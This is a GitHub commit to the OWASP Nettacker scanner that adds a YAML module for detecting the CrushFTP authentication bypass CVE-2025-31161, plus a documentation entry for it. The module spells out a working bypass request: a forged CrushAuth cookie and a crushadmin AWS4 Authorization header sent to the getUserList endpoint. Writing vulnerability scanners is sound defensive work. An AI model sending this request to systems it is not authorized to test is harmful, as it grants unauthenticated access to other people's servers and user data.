Skip to content

Commit 6eb1f57

Browse files
New module to detect CrushFTP CVE-2025-31161 (#1126)
* New module: crushftp_cve_2025_31161_vuln * Update nettacker/modules/vuln/crushftp_cve_2025_31161.yaml coderabbit formatting fix Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com> Signed-off-by: Sam Stepanyan <[email protected]> * clean-up coderabbit issues --------- Signed-off-by: Sam Stepanyan <[email protected]> Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
1 parent 281a072 commit 6eb1f57

File tree

2 files changed

+61
-0
lines changed

2 files changed

+61
-0
lines changed

docs/Modules.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -139,6 +139,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
139139
* '**clickjacking_vuln**' - check the web server for missing 'X-Frame-Options' header (clickjacking protection)
140140
* '**content_security_policy_vuln**' - check the web server for missing 'Content-Security-Policy' header
141141
* '**content_type_options_vuln**' - check the web server for missing 'X-Content-Type-Options'=nosniff header
142+
* '**crushftp_cve_2025_31161_vuln**' - check the target for CrushFTP CVE-2025-31161 vulnerability
142143
* '**f5_cve_2020_5902_vuln**' - check the target for F5 RCE CVE-2020-5902 vulnerability
143144
* '**heartbleed_vuln**' - check SSL for Heartbleed vulnerability (CVE-2014-0160)
144145
* '**msexchange_cve_2021_26855**' - check the target for MS Exchange SSRF CVE-2021-26855 (proxylogon/hafnium)
Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
info:
2+
name: crushftp_cve_2025_31161_vuln
3+
author: OWASP Nettacker Team
4+
severity: 9.8
5+
description: >
6+
This module checks for a critical improper authentication vulnerability in CrushFTP
7+
(CVE-2025-31161). The vulnerability allows unauthenticated users to access sensitive
8+
files and execute arbitrary commands, leading to potential data exposure and system
9+
compromise.
10+
11+
reference:
12+
- https://ccb.belgium.be/advisories/warning-critical-improper-authentication-vulnerability-crushftp-patch-immediately
13+
- https://nvd.nist.gov/vuln/detail/CVE-2025-31161
14+
- https://www.huntress.com/blog/crushftp-cve-2025-31161-auth-bypass-and-post-exploitation
15+
16+
profiles:
17+
- crushftp
18+
- vuln
19+
- vulnerability
20+
- http
21+
- high_severity
22+
23+
24+
payloads:
25+
- library: http
26+
steps:
27+
- method: get
28+
timeout: 3
29+
headers:
30+
User-Agent: "{user_agent}"
31+
Cookie: "CrushAuth=1111111111_111111111111111111111111111111111"
32+
Authorization: "AWS4-HMAC-SHA256 Credential=crushadmin/"
33+
Connection: "close"
34+
allow_redirects: false
35+
ssl: false
36+
url:
37+
nettacker_fuzzer:
38+
input_format: "{{schema}}://{target}:{{ports}}{{paths}}"
39+
prefix: ""
40+
suffix: ""
41+
interceptors: []
42+
data:
43+
paths:
44+
- "/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=1111"
45+
schema:
46+
- "http"
47+
- "https"
48+
ports:
49+
- 80
50+
- 443
51+
- 8080
52+
response:
53+
condition_type: and
54+
conditions:
55+
status_code:
56+
regex: '200'
57+
reverse: false
58+
content:
59+
regex: '<user_list_subitem>crushadmin</user_list_subitem>'
60+
reverse: false

0 commit comments

Comments
 (0)